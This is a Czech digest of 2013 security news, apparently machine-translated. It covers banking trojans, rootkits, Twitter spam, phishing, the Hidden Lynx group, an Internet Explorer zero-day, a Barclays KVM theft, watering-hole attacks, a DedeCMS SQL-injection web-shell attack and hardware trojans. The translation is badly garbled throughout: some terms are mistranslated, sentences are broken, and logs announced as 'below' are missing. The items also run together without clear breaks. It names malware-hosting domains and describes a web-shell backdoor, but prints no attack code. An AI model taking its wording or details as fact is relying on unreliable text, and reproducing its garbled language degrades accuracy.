Kradmý bankovnictví Trojan známý jako Caphaw nebo Shylock se vynořuje - a útočí na zákazníky z 24 amerických bank . Je vyzbrojen obranných a stealth schopností , včetně pravomocí " obnovit " se během vypnutí .
Malware je popisován jako " jeden z mála , který může ukrást peníze , kdyžuživatel přistupující jeho bankovní konta , " ESET Team Security Intelligence olovo , Aleksandr Matrosov , kdo vydal podrobnou analýzu malware v letošním roce.
" Je to zajímavý finanční malware rodina : jeden z mála, který má funkce autoload pro automatické krást peníze , když uživatel aktivně přístupu jeho bankovní účet. Infikovaný uživatel nemůže rozpoznat , že jeho peníze jsou ukradené, " píše Matrosov .
" Tato hrozba má mnoho technik pro vynechání bezpečnostní software a vyhnout automatizované zpracování vzorků malwaru . "
Zscaler uvedl na svém blogu : " Za poslední měsíc se ThreatLabZ vědci aktivně sleduje nedávné uptick v počtu Win32/Caphaw ( od nynějška známá jako Caphaw ) infekce , které se aktivně zaměřují na bankovní účty uživatelů od roku 2011 . Můžete rozpoznat tuto hrozbu z výzkumu hotový WeLiveSecurity letos v souvislosti s touto hrozbou cílení EU bankovní weby . Tentokrát se zdá být v ničem neliší . Zatím jsme svázané tuto hrozbu monitorovat Je to oběť za přihlašovací údaje do 24 finančních institucí. "
Bezpečnostní firma Zscaler oznámily nárůst detekcí malware tento týden, zaměření 24 amerických bank včetně Chase Manhattan , Bank of America , Citi a Wells Fargo . Poprvé zjištěn v roce 2011 ,malware cílený evropských zákazníků ve Velké Británii , Itálii, Dánsku a Turecku.
Zscaler Výzkumníci říkají, že malware byl pravděpodobně šíří pomocí exploit kitu přes zranitelných verzí Javy.
V tuto chvíli ESET Virus Radar ukazuje nárůst infekcí v Severní Americe. Zscaler varuje, že kradmé povaha malwaru znamená, že je obtížné zjistit - více informací na stealth schopnosti tohoto malwaru lze nalézt v analýze Matrosov je.
" Caphaw můžete ovládat restart / vypnutí procesu a umožňujemalware obnovit sám po některé antivirové čistící postupy byly provedeny , " řekl Matrosov ve své funkci .
Příspěvek nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank se objevila na prvním místě Žijeme zabezpečení.
HIPAA 9/23 termín splnění vynořuje jako poruší pokračovat
22 září 2013 Bezpečnost
Jedná se o rychlý připomínkou toho, že 23.září Lhůta k dosažení souladu s novými předpisy HIPAA se rychle blíží . Organizace , které se zabývají chráněné informace o zdravotním stavu ( PHI ), je třeba , aby se ujistili, že jsou až do rychlosti na změny a připravené , aby vydržely zkoumání. Obecně platí, že budete potřebovat nové jaderné elektrárny a Baas ( oznámení o ochraně soukromí praktiky a dohod obchodní partner ) .
Mluvili jsme o novém HIPAA v příspěvku blogu srpna. a já jsem zaznamenal webcast na změny HIPAA , které můžete sledovat . Krátce na to po HIPAA vzrostly máme ošklivou připomínku o tom, jak špatně věci mohou pokazit při manipulaci PHI . 26. srpna Zdravotnictví IT News uvedla, že jedním z největších amerických poskytovatelů zdravotní péče , systému advokáta zdraví začalo oznámením 4 miliony lidí , že chráněné zdravotní informace a čísla sociálního pojištění byla narušena po krádeži čtyř nešifrované firemních počítačů . To je docela ohromující řada citlivých záznamů , pobízet titulek " Behemoth porušení " . Je zřejmé, advokát čelí miliony dolarů v neočekávaných nákladů k nápravě tohoto, a můžete se vsadit, OCR vyšetřovatelé budou chtít vidět , kde organizace dokumentovat své rozhodnutí ke kódování těchto záznamů.
Zmínil jsem , že je důležité dokumentace HIPAA předtím. Pokud existuje jedna věc, která se zdá vyprovokovat zlobu OCR je nedoložení své důvody pro bezpečnostní poloze jste přijali , jinými slovy,jedna věc je horší než špatné rozhodnutí není žádné rozhodnutí , protože jste se ani neobtěžoval myslet o tom. Nyní je ten správný čas , aby se ujistil své rizik a PHI datové toky jsou řádně zdokumentována a výrazně snížit vaše šance končí na zdi hanby.
Pokud chcete kopii snímky , které jsem použil ve webcastu prosím e-mail stephen [ dot] Cobb [at] eset [ dot] com . Zkontrolujte také, zda se řešení ESET na zdravotní péči pro více užitečných informačních zdrojů .
Vědci objevovat vazby mezi TDSS a ZeroAccess rootkit rodiny 22.09.2013 Rootkit Mnoho bylo řečeno a napsáno o dlouhodobé TDSS (nebo TDL) a podstatně novější ZeroAccess (nebo Sirefef), rootkity a podobnosti mezi nimi byly předtím nevšimla, ale odborníci Trend Micro objevili něco, co může uvádět přímé vazby existují mezi oběma rodinami malwaru. Oba TDSS a ZeroAccess má dobře zdokumentovanou rootkit schopnosti. Oba používají peer-to-peer techniky komunikace a provoz pošlou je kódován pomocí base64 a vycpaná nesmyslné znaky. Oba mají jeden hlavní cíl:. Klikání Ale, jak vědci na vědomí , "jak stále udržovat oddělené P2P sítě s podobnými funkcemi, ale odlišné uplatňování Navíc ZeroAccess vždy napadá objekty COM a. Service.exe , zatímco TDSS vždy infikuje MBR (Master Boot Record). " Je také zajímavé si povšimnout, že ZeroAccess bylo známo, že zakázat TDSS, pokud zjistí, na počítači je ohrožena, což by zřejmě znamenalo dvě rootkity (a gangy šířící nich) jsou soupeři. Ale teď Vědci zjistili, že starší verze ZeroAccess a některé novější verze TDSS byly pomocí stejné domény v ten samý den.
"Věříme, že doména generace algoritmus modul používá starší ZeroAccess malware je nyní upraveno TDSS specificky DGAv14 variant," říkají, ale zdůraznit, že to není nutně neznamená, že zločinci jsou odpovědní přímo spolupracují. "modul DGA může být získána od třetí strany a / nebo TDSS mohou vydělat peníze tím, že hostí částí ZeroAccess, "oni předpokládají. Nicméně, objev z nich dělá se domnívají, že existují vazby mezi oběma rodinami malwaru.
Breaking Bad Fanoušci zaměřena Spam Seznam Twitter 21.září 2013 Spam
Na paty jeho nejvíce ceněné epizody mohou Breaking Bad fanoušky tweetovat o populární show AMC ocitnou terčem novým Twitter taktiku spamu.
Tradičně, spammery a podvodníky zneužity odpovědní funkce integrované do služby, ale v průběhu let, spammeři hledali různé způsoby, jak se zviditelnit mezi uživateli Twitteru. Poslední taktika využívána, se nazývá seznam spam.
Seznam Twitter skládá z Kurátor skupiny uživatelů Twitter. Uživatelé si mohou vytvořit své vlastní seznamy, nebo objednat na existujících seznamech již vytvořených ostatními. Spammeři pomocí této funkce získat pozornost uživatelů Twitter.
Různé nástrahy byly použity v seznamu nevyžádané pošty Twitter nedávno nabízet čísla celebrity telefonu na volné dárkové karty, zařízení a videoher.
Tento víkend, předposlední epizoda Breaking Bad "Granite State," bude vysílat. Přehlídka získala hodně brnknout a fanoušky, jako jsem já, se netrpělivě počítá dny do neděle. Spammeři jsou na koni coattails přehlídky popularity ve snaze přimět uživatele k stahování unikly kopii příští epizodě.
Twitter seznam spam začíná s tím, že přidá do seznamu spolu s tisíci ostatními uživateli. Obvykle se tento typ spamu vyžaduje, abyste navštívit seznamu Creator si stránku vidět odkaz spam. V tomto případě je však odkaz uveden v seznamu popisu.
URL vede k Pastebin, který obsahuje odkazy na různé souborové hostingových služeb pro stahování epizodu.
Soubor hostingové služby obsahuje 280 megabajtů soubor pro uživatele ke stažení. Kromě toho mohou uživatelé zvolit stáhnout torrent soubor, který chcete použít peer-to-peer stahování získat epizodu.
Po stažení, jsou tam dva soubory ve PSČ: textový soubor s názvem "Jak otevřít - READ first.txt" a velký soubor (téměř 300MB).
Aby bylo možné otevřít velké soubory, uživatelé jsou instruováni, aby si stáhnout nejnovější verzi 7-Zip. Odkaz směruje uživatele prostřednictvím affiliate program, který je, jak podvodníci vydělat peníze. Partnerský program směruje uživatele na instalační balíček, který je dodáván s jinými aplikacemi. Uživatelé si mohou zvolit, že nechcete instalovat tyto aplikace.
Nakonec, instalace tohoto souboru je zbytečné, neboť video soubor lze otevřít v jakémkoliv přehrávači. Není divu, že je stažený epizoda je z počátku tohoto období.
Twitter seznam spam je nový trend , který se získává trochu trakce. Pokud zjistíte, že přidá do seznamu Twitter, můžete odstranit sami ze seznamu zpráv pro uživatele, že si vás přidali
Chtěli byste nějakou rybu s tím phishing?
21.září 2013 Phishing
Útočníci jsou známé pro výrobu jejich phishingové stránky vypadat přesně jako weby, které jsou spoofing. Viděli jsme spoustu příkladů detailu, které zaměstnávají, stejně jako pomocí JavaScriptu obsahovat aktuální datum ve svých statických stránek. V nedávné době, Symantec došlo k nárůstu v obecné e-mailové phishingu. Na rozdíl od běžného phishingu, kde phishingových zpráv mají obvykle na mysli cíl (klientů bank nebo sociální uživatelé sítě, například), obecný e-mail phishing technika je mírně odlišná. V obecné e-mailové phishingu, bude phishingu zaměřují libovolnou e-mailovou adresu, kterýž cíl nezáleží.
Tyto obecné phishingových zpráv obvykle tvrdí, že příjemce velikosti poštovní schránky byl překročen, a nasměrovat je, aby urychleně "znovu potvrdit" své poštovní schránce, aby se zabránilo narušení svého e-mailu. Symantec nedávno identifikovali obecný e-mail phishing stránky, které na první pohled vypadal normálně. Vypadalo to docela amatérsky-ukazuje špatné Útočníci "návrhářské schopnosti, když nemají profesionální stránky vykrást, ale místo bylo překvapivě neobvyklé pro jednoho důvodu: měl rybí podtisk.
phish_site_with_fish_600px.jpg Obrázek. Generic phishing webové stránky s pozadím rybí vzor.
Nejsme si jisti, proč phishingu rozhodli využít tuto konkrétní pozadí. Byl to náhodný, nešťastný omyl? Vtip mezi kolegy phisherů? Nebo snad drzá, ale ne tak subtilní náznak zkušené uživatele, že to bylo ve skutečnosti phishingové stránky? Možná, protože web je částečně italsky, že phishingu nevěděli o podobnosti mezi "phish" a "ryby"?
Chcete-li chránit před phishingovými útoky, být opatrný zpráv prohlašovat, že váš účet byl omezen nebo nějak třeba aktualizovat. Udržujte svůj bezpečnostní software aktuální. Symantec.cloud a Symantec Messaging brána zákazníků jsou chráněny před těmito hrozbami.
Skryté Lynx - Profesionální hackeři k pronájmu
21.září 2013 Hacking | Kriminalita
Za posledních několik let, zprávy se objevují stále popisovat činnosti aktérů stojí za různých cílených útoků nebo pokročilých perzistentních hrozeb (Apts). Zde na Symantec Security Response, jsme se udržet oči na skupinu, které věříme, že patří mezi to nejlepší z plemene. Dali jsme jim jméno Skrytá Lynx-po řetězu, který byl nalezen ve sděleních velení a řízení serveru. Tato skupina má hlad a úsilí, které převyšují ostatní známých skupin, jako jsou APT1/Comment Crew. Hlavní charakteristiky této skupiny jsou:
technická zdatnost hbitost organizovaný naprostá vynalézavost trpělivost Tyto atributy jsou znázorněny na houževnaté kampaní vedených proti více souběžných cílů po delší časové období. Jsou průkopníky "zavlažování díra" technice zálohy cíle, mají včasný přístup k zero-day zranitelností, a mají houževnatost a trpělivost inteligentní lovce narušena dodavatelského řetězce, aby se na skutečné cíle. Tyto útoky dodavatelském řetězci provádí infikování počítačů u dodavatele zamýšlené cíle a pak čekat na infikované počítače, které mají být nainstalovány a volání domů, jasně jsou super vypočtené akce spíše než impulsivní nájezdy amatérů.
Tato skupina není jen omezit na několika cílů, místo toho se zaměřuje na stovky různých organizací v mnoha různých oblastech, a to i současně. Vzhledem k šíři a množství cílů a zúčastněných regionů, usuzujeme, že tato skupina je s největší pravděpodobností profesionální hacker-pro-pronájem operace, které jsou smluvně klientům poskytovat informace. Kradou na vyžádání, bez ohledu na jejich klienti mají zájem, a proto je široká škála a rozsah cílů.
Věříme také, že k provádění útoků tohoto rozsahu, musí skupina mít značné odborné znalosti hacking má k dispozici, jsou asi 50 až 100 dělníků zaměstnaných a jsou uspořádány do nejméně dvou různých týmů, a to jak za úkol provádět různé činnosti s použitím různých nástrojů a technik . Tyto typy útoků vyžadují čas a úsilí, aby provedl některé z kampaní vyžaduje výzkum a inteligenční shromáždění před tím, než úspěšné útoky mohou být namontovány.
V přední linii této skupiny je tým, který používá jedno nástroje spolu se základními, ale účinné techniky k útoku na mnoho různých cílů. Mohou také působit jako zpravodajské kolektory taky. Tento tým říkáme Team Moudoor po názvem Trojan, které používají. Moudoor je zadní dveře Trojan, který používá tým štědře bez obav o odhalení ze strany bezpečnostních firem. Druhý tým funguje jako speciální zásahové jednotce, elitní personální použité rozlousknout nejcennější a nejtěžší cíle. Elitní tým používá trojského koně s názvem Naid a jsou proto označovány jako Team Naid. Na rozdíl od Moudoor je Naid Trojan používána střídmě a opatrně, aby se zabránilo odhalení a zachytit, jako tajnou zbraň, která se používá pouze v případě selhání není volba.
Od roku 2011 jsme pozorovali nejméně šest významných kampaní touto skupinou. Nejpozoruhodnější těchto kampaní je útok VOHO kampaň v červnu 2012. Co bylo zvláště zajímavé o tomto útoku bylo použití útoku zalévání otvorů techniky a ohrožení důvěryhodného Bit9 v souboru podpisu infrastruktury. Kampaň VOHO byl nakonec útoků na americké obranné dodavatelů, jejichž systémy byly chráněny založené na důvěře Bit9 v oblasti ochrany software, ale když bylo dosaženo skrytého Lynx útočníků blokován tuto překážku, ale znovu své možnosti a zjistil, že nejlepší způsob, jak kolem ochrany byla ohrožena Srdcem systému ochrany sám a rozvrátit ji pro své vlastní účely. To je přesně to, co udělal, když budou přesměrována svou pozornost na Bit9 a porušila jejich systémů. Po porušen, útočníci rychle našly cestu do souboru podpisu infrastruktury, která byla základem Bit9 ochranu modelu se pak používá tento systém, aby podepsali řadu malware souborů a pak tyto soubory byly použity v pořadí zkompromitovat skutečné určené cíle .
Pro zájemce o podrobnější informace, jsme publikovali podrobnou zprávu , která popisuje skupinu a útočné akce prováděné ně.
Také jsme dát dohromady infographic, která shrnuje nejdůležitější informace o tomto plodného Hidden Lynx skupiny.
E3292280-HiddenLynx-Infographic.png
Nový Internet Explorer Zero-day Nalezeno v cílených útoků
21.září 2013 Zranitelnosti | Hacking
17. září, Microsoft vydá certifikát Poradní Ohlášení nové zero-day zranitelnosti v aplikaci Internet Explorer: Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013 až 3893). Doporučení uvádí, že zranitelnost může dojít k poškození paměti takovým způsobem, který by umožnil útočníkům spustit libovolný kód. Útok funguje lákavé uživatele k návštěvě speciálně vytvořené webové stránky, na jejichž území se chyby zabezpečení prostřednictvím aplikace Internet Explorer. Microsoft rovněž uvádí, že v této době je známo, že zranitelnost být využívány pouze v omezeném počtu cílených útoků.
Zatímco Microsoft je ještě vydat opravu této chyby, které již byly poskytnuty dočasné " Fix It "nástroj řešení jako řešení, dokud je tato aktualizace zabezpečení k dispozici. Aby Zákazníci Symantec jsou chráněny proti tomuto Internet Explorer zero-day, následující ochrana byla zavedena:
Antivirus
Bloodhound.Exploit.513 Intrusion Prevention System
Web útok: Microsoft Internet Explorer CVE-2013-3893 Web útok: MSIE poškození paměti CVE-2013-3893 3 Symantec bude i nadále vyšetřovat tento útok s cílem zajistit nejlepší možnou ochranu místě. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru a nezahájí žádné podezřelé e-maily. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Symantec spotřebitelských a podnikových řešení, aby co nejlépe chránit před útoky tohoto druhu
Produkt Pokrytí a zmírnění jejich důsledků pro CVE-2013-3893
Zpravodaj zabezpečení společnosti Microsoft (2887505) 17. září th , 2013, publikoval Microsoft Security Advisory 2887505, který coverers vzdálené spuštění kódu ve všech podporovaných verzích aplikace Microsoft Internet Explorer. Chyba spočívá v manipulaci s objekty v paměti, které byly odstraněny nebo nesprávně přidělena. Konkrétně může use-po-free chyba v HTML engine (aka mshtml.dll) být použity k vyvolání stavu ohrožení. Tato chyba je v současné době využíván v omezených a cílené útoky. Funkční využití a malware artefakty byly identifikovány ve volné přírodě. Sanace / Zmírnění Microsoft Společnost Microsoft vydala Fixit zástupného řešení k řešení tohoto problému. Kompletní oprava ještě není uvolněna. Zdroje http://technet.microsoft.com/en-us/security/advisory/2887505 http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx McAfee Labs Následující produkty McAfee / zabezpečují pokrytí McAfee Vulnerability manažer McAfee MVM / FSL Obsah Vydání 9/18/2013 McAfee Antivirus Pokrytí je k dispozici v 7204 DAT, propuštěn na 9/20/2013 Jméno - Exploit-IE heur McAfee Network Intrusion Prevention Systems (NIP) UDS Nouzové odblokování v 9/17/2013 UDS podpis útok ID 0x4510ef00 Name = "UDS-HTTP: Microsoft Internet Explorer onlosecapture Použití po volném zabezpečení Jako nové informace je možno získat, nebo produkt, pokrytí je aktualizován, společnost McAfee Labs vás informovat.
RSA radí zákazníkům, aby přestali používat NSA-ovlivňoval šifrovací algoritmus 21. září 2013. Šifrování | KyberSeucirity V návaznosti na zveřejnění , že NSA ovlivnila NIST přijmout šifrovací standard, který obsahuje jeden náhodný generátor bit se slabostí, který zná pouze zpravodajské agentury NIST znovu otevřela veřejnosti komentář období pro standard tak, aby veřejnost mohla analyzovat a to znovu komentovat.
Také slíbil, že pracovat s kryptografickým komunity řešit jakékoliv chyby, které mohou být nalezeny, a doporučil , aby generátor na otázku (Dual_EC_DRBG) již není možné použít. A podle Ars Technica , RSA Security se rozhodl poslouchat. Společnost poslal z poradní pro vývojáře zákazníků svých Bsafe Toolkits a Data Protection Manager, a oznámí jim, že nástroje byly pomocí algoritmu ve výchozím nastavení, které jim na tom, jak to změnit. Všechny verze obou nástrojů jsou ovlivněny. Podle mluvčí společnosti RSA vede vnitřní přezkum všech svých produktů, aby zjistil, zda algoritmus je vyvolána v žádném z nich, ale zdroj blízký společnosti potvrdil , že jeho vlajkový produkt - dvoufaktorová autentizace SecurID systému -. nepoužívá chybný algoritmus "V té době, eliptické křivky byly v módě a hash-based RNG byl pod kontrolou nadějí bylo, že eliptické křivky techniky, které se zakládají na teorii čísel. -by neměla trpět mnoho ze stejných slabých stránek jiných technik (jako FIPS 186 SHA-1 generátoru), které byly považovány za negativní, a Dual_EC_DRBG byla přijata a veřejně zkoumány standard, "RSA Security CTO Sam Curry vysvětlil, proč se společnost rozhodla použít algoritmus jako výchozí obou přípravků. Dodal také, že tam byla řada funkcí, které dělal to vypadat ideální v té době (2004-2005): průběžné testování výstupu, povinné re-setí, volitelný predikce odpor a Možnost konfigurovat pro různé síly. RSA vyslala poradenství pro volbu vývojářům, ale toto varování by mělo být dbal mnoho, že pravděpodobně neobdrželi, v e-mailu.
Stupeň ohrožení Žlutá: Ochrana doporučení týkající se aplikace Internet Explorer využije v přírodě
20. září 2013.Zranitelnosti | Hacking
Internet Storm Center začíná vidět více poznatků o zneužití ve volné přírodě o Microsoft Security Advisory 2887505 . V souladu s tím jdeme na InfoCon až žlutá.
Per poradenství: Microsoft vyšetřuje veřejné zprávy o zranitelnosti ve všech podporovaných verzích aplikace Internet Explorer. Microsoft si je vědoma cílených útoků, které se pokoušejí zneužít tuto chybu zabezpečení v aplikaci Internet Explorer 8 a Internet Explorer 9. Aplikace Microsoft Fix IT řešení, CVE-2013-3893 Fix It Obejití , zabraňuje využívání tohoto problému. Toto řešení je i fixit Emet 4.0 pokynů. Jistě zvážit použití Emet 4,0 , kde můžete. Upozorňujeme, že opravy se zdá, že jen pomoci 32bitové verze prohlížečů. To znamená, že zranitelnost postihuje všechny verze aplikace Internet Explorer, s výjimkou případů systémů Windows Server 2008 a 2012 základních zařízení.
Zdá se, že exploit byl ve volné přírodě od 29.srpna 2013, kdy byl poprvé viděn jeden z on-line bezpečnostních skenerů. Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle.
Vznikající hrozby má Snort podpisy pro tento problém: http://www.emergingthreats.net/2013/09/19/daily-ruleset-update-summary-09192013/ . Očekávejte rychlý 7 až pravděpodobných bitů vydání Metasploit v blízké budoucnosti. Budeme aktualizovat zde vidíme více informací o této chybě se objeví.
Osm zatčen více než 1.300.000 liber krádeží z Barclays Bank 20. září 2013. Hacking | Kriminalita Osm mužů byli zatčeni policií Metropolitní ústředního e-Crime Unit (PZKO) v souvislosti s 1.300.000libra krádeží gangu, který ukradl peníze tím, že kontrolu pobočky Barclays Bank počítačového systému.
Hledá se v současné době provádí na adresy v Westminster, Newham Camden, Brent a Essexu, kde se nemovitost konfiskované, včetně hotovosti, šperků, léků, tisíce kreditních karet a osobních údajů. Jedna centrální Londýn prostor byl popsán detektivů jako "řízení" centra pro podvodníky pracovat z. Zatčení jsou výsledkem dlouhodobého zpravodajského operaci Metropolitní peću policie, ve spolupráci s Barclays Bank, kteří byli vyšetřování krádež 1.300.000libra od švýcarské chatě pobočky Barclays v dubnu 2013. Dne 5. dubna 2013 Barclays Security ohlásil ztrátu 1.300.000 liber z účtu na policii. Bylo zahájeno vyšetřování a hledání švýcarské chatě pobočky v severním Londýně byla provedena, v němž byl KVM přepínač připojený k 3G routeru našel připojena k jednomu z počítačů poboček. KVM přepínač je hardwarové zařízení používá oprávněně v podnikání umožňují uživatelům pracovat vzdáleně na svých systémech pracovním počítači. To umožňuje uživateli ovládat více počítačů z jednoho nebo více klávesnice, video monitoru a myši. I když více počítačů jsou připojeny k KVM, lze obvykle jeden nebo menší počet počítačů řídit v daném okamžiku. Později bylo zjištěno, že předchozí den male mely IT technik získal přístup k oboru, falešně uvádí tam byl na opravu počítače. On pak nasadili KVM zařízení. To umožnilo zločinecké skupiny vzdáleně převod finančních prostředků do předem zpět účty pod kontrolou zločinecké skupiny. Barclays byli schopni získat značné množství ukradených peněz. Tato nová a zvyšující se metodika by byl viděn prosazování práva Spojeného království ukazuje na rychle se vyvíjející povahu . nízkým rizikem, vysoká finanční výnos cyber povolen zločin inspektor Mark Raymond z PZKO Met řekl: "Tyto zatčení bylo dosaženo v partnerství s virtuální Task Force (VTF), jedinečná sdílení informací cyber spolupráce mezi PZKO a ve Velké Británii Bankovní sektor. "Osoby zodpovědné za tento trestný čin jsou významnými hráči v rámci sofistikovaného a odhodlaný organizované zločinecké sítě, která používá značné technické schopnosti a tradiční trestní know-how infiltrovat a využívat zabezpečené bankovní systémy."
Webové stránky firem z odvětví energetiky ohrožena zalévání děr útok 20. září 2013. Viry | Hacking | Zranitelnosti Webové stránky téměř tucet firem z odvětví energetiky byly zneužity sloužit jako tzv. "zalévání děr", kde by se návštěvníci podávané s malware nebo které by mohly být přesměrovány na jiné webové stránky, kde je totéž by se stalo.
Podle Cisco výzkumníků, kteří sledovali útok od začátku května, mezi deseti webových stránek, které byly injekce s nebezpečným iframe použité v kampani, jedna patří k průzkumu ropy a zemního plynu firmy s operacemi v Africe, Maroku a Brazílie , jeden na rozvod plynu se nachází ve Francii, jeden fyzické stanice plynové elektrárny ve Velké Británii, a několik investičních a kapitálových firem, které se specializují na odvětví energetiky. Téměř polovina návštěvníků na těchto stránkách pocházejí z finančního a energetického sektoru. "Je zajímavé, že šest z deseti iframe vstřikováním webových stránek hostované na stejném serveru, zřejmě služby podle stejné firmy web design. Tři z těchto šesti byl rovněž ve vlastnictví téže mateřské společnosti," zdůraznil Cisco Emmanuel Tacheau. "To je pravděpodobně údaj lokality byly ohroženy prostřednictvím ukradených přihlašovací údaje, případně v důsledku infekce s konstrukční firmy nebo jejich poskytovatele hostingu." malware je umístěn na stránkách tří napadených internetových stránek ( keeleux.com , kenzhebek.com a nahoonservices.com ) a nainstalovat na počítače obětí útočníci mají pákový efekt, využít kód pro zranitelností ve starších verzích Javy, Internet Explorer a Firefox / Thunderbird. Tacheau neříká, zda je kampaň probíhá, ale ukázal na to, že jak čas plynul, útočníci modifikovali vstřikováním iframe, využívat kódu a servírované malware. "chrání uživatele před těmito útoky zahrnuje vedení stroje a webových prohlížečů plně patch, aby se minimalizovalo množství chyb zabezpečení, které útočník může zneužít," poukázal na to, s tím, že webový provoz filtrování řešení nasazeno na úrovni sítě může blokovat škodlivý obsah před tím, než může dosáhnout stroje určeného cíle.
Pole v žádostech, PHP a DedeCMS
20. září 2013. Hacking
Dostali jsme zajímavé podání o podivné hledá Apache web server log. Zatímco log nevypadá škodlivý, po přezkoumání pečlivě rozhodně vypadá divně, jak můžete vidět níže:
Protokolu, jak je uvedeno níže, obsahuje požadavek na skript download.php PHP s partou parametrů, které se zdají být stejné. Po dekódování% 5B% 5D a na [a], žádost stává trochu více zřejmé:
Žádost obsahuje opakování výše arrs1 [] parametry - PHP zachází jako ty členy pole, takže to vlastně vytvoří pole s názvem arrs1 (a později arrs2, jak je uvedeno v původním protokolu), který obsahuje různé množství. Tato čísla (99, 102, 103 ...) vypadají jako ASCII kódování, takže dalším krokem k dekódování je tlačit přes perl jedné folie, která bude pracovat na původním protokolu:
A to rozhodně vypadá škodlivé. Po trochou výzkumu se ukázalo, že se jedná o útok na známé zranitelnosti v DedeCMS, CMS napsaný v PHP, který se zdá být populární v Asii. Tento CMS má docela nepříjemný SQL injection zranitelnosti, které lze využít při žádosti je uvedeno výše.
Tato chyba zabezpečení existuje, protože CMS používá $ GLOBALS globální proměnnou, která je dále rozšířena do SQL dotazu. Výsledný dotaz od dekódované útoku nahoře, je docela zřejmé: útočník vytvoří soubor s názvem 90sec.php, který je velmi jednoduchý PHP shell backdoor, který umožňuje útočníkovi spustit libovolný příkaz s POST HTTP požadavku, který obsahuje příkaz k být provedeny v parametru s názvem guige (zvýrazněno).
Zatímco v tomto případě to bylo prostě způsob, jak převést pole přes GET, může podobný požadavek také zneužívat HTTP útoky parametrů znečištění, kde je jediný parametr, kdy několikrát do GET nebo POST požadavky, což potenciálně neočekávané chování.
Navíc, jak můžete vidět v logu na vrcholu, User Agent string byl nastaven na WinHttp.WinHttpRequest, což znamená, že tento požadavek byl vytvořen skript nebo nástroj útoku provedeného na stroji s Windows.
Vertexnet Botnet se skrývá za AutoIt
20. září 2013. BotNet | Bezpečnost | Viry
Nedávno jsme objevili nové škodlivé vzorků pomocí Autoit ukrýt. Na další analýzy jsme zjistili, že ti vzorek patří do Vertexnet botnet. Oni používají několik vrstev mlžení, jednou dekódovány, se připojují k řídící server přijímat příkazy a přenášet ukradených dat. Tento vzorek je zabalen pomocí vlastní balírny. O výkonu klesne tři soubory v složky% TEMP%.
Tyto soubory jsou zpracovány s využitím aut2exe. Další malware spustí soubor botnet.exe ze složky temp. Tento soubor je napsán v AutoIt. Můžeme snadno dekompilovat ho pomocí Exe2Aut.
Tento soubor používá různé popletl proměnné, které jsou šifrovány pomocí jednoduchého algoritmu:
Dekódování proměnné, můžeme vidět, že tento skript volá různých rozhraní API systému Windows pomocí AutoIt DLL funkce DllStructCreate, DllStructGetPtr, DllCall, atd.
Vyhledávání Google, jsme snadno najít původní kód by mohly být použity v předchozím skriptu se mlžit: http://www.autoitscript.com/forum/topic/99412-run-binary/ (Předchozí příspěvek obsahující informace o tom, jak spustit spustitelný soubor z paměti je starý. Bylo vyrobeno asi 2009 na autoitscript.com.) Technika spuštění spustitelný soubor z paměti pomocí skriptu AutoIt je dobře zdokumentováno na tento odkaz. Abychom to shrnuli, že nejprve vytvoří proces s CREATE_SUSPENDED vlajkou:
Dále se používá GetThreadContext dostat kontextu strukturu:
Následně se používá WriteProcessMemory, SetThreadContext a přiděluje paměť pro data.
Pak pokračuje nit:
Po dumping dat výběrových WriteProcessMemory, dostaneme Visual Basic soubor, který používá metodu RunPE vykonat užitečného zatížení:
Konečný náklad je VertexNet 1,2, což jsme zjistili z řetězců, které obsahuje: O provedení konečné užitečného zatížení, komunikuje s řídícím serverem:
Vidíme neustálý nárůst AutoIt malware, protože jeho snadné použití. Zjistili jsme, že autoři malware vždy ready-made nástroje a rychle se přizpůsobit novým trikům. McAfee zákazníci jsou chráněny proti této hrozbě podpisem IPS: BOT: VertexNet Bot zjištěna činnost. Rád bych poděkoval svému kolegovi Arunpreet Singha za jeho pomoc s analýzou této hrozby.
19.09.2013 Viry | Hardware | KyberSecurity Tým bezpečnostních výzkumníků z USA a Evropy zveřejnil pojednání ukazující na to, jak mohou být integrované obvody v počítačích i armádním vybavení během výrobního procesu napadeny pomocí neodhalitelných změn na úrovni tranzistorů.
Pojednání jako příklad účinnosti této metody popisuje, jak by mohla být použita k upravení a oslabení generátoru náhodných čísel na procesoru Ivy Bridge.
Tento výzkum je prvním, který popisuje možnost vložení hardwarového trojského koně do procesoru bez dodatečných obvodů, tranzistorů či jiných zdrojů, popsal Christof Paar, vedoucí fakulty informačních technologií na německé Rúrské univerzitě.
Podle Paara jsou hardwarové trojské koně předmětem výzkumu již od roku 2005, kdy americké ministerstvo obrany vyjádřilo znepokojení nad tím, že se armáda spoléhá na integrované obvody vyráběné v zahraničí.
Jednotlivé bloky obvodu v jediném mikročipu často navrhuje několik různých subjektů, vyrábí je jedna zahraniční firma, druhá je balí a třetí distribuuje, což podle pojednání vedlo k problémům s důvěrou a k obavám o bezpečnost.
V průběhu let věnovali výzkumníci pozornost spíše nacházení způsobů, jak tyto zákeřné součásti v hardwaru, které byly do čipu záměrně umístěny během výrobního procesu, nalézt a odstranit, především v případech, kdy mají čipy sloužit například armádě. Celkem překvapivě se však mnohem méně pozornosti věnovalo tomu, jak by mohl někdo hardwarového trojského koně v první řadě sestavit a implementovat.
Předchozí výzkumy popisovaly hardwarové trojské koně skládající se z malých až středních integrovaných obvodů přidaných do procesoru během vytváření vrstvy jazyka popisu hardwaru. Poslední výzkum oproti tomu ukazuje, jak může být trojský kůň umístěn v pozdější fázi výroby, a to změnou dopování v několika tranzistorech.
Dopování je proces, který modifikuje elektronické vlastnosti křemíku přidáním různých „nečistot“, například boru, fosforu nebo galia, jeho přepnutím přestanou části integrovaného obvodu fungovat tak, jak by měly.
Změny se odehrávají na úrovni atomů a podle Paara je opravdu těžké něco takového zpozorovat. „Opticky nelze poznat rozdíl,” řekl. Trojský kůň je tak odolný proti většině detekčních technik.
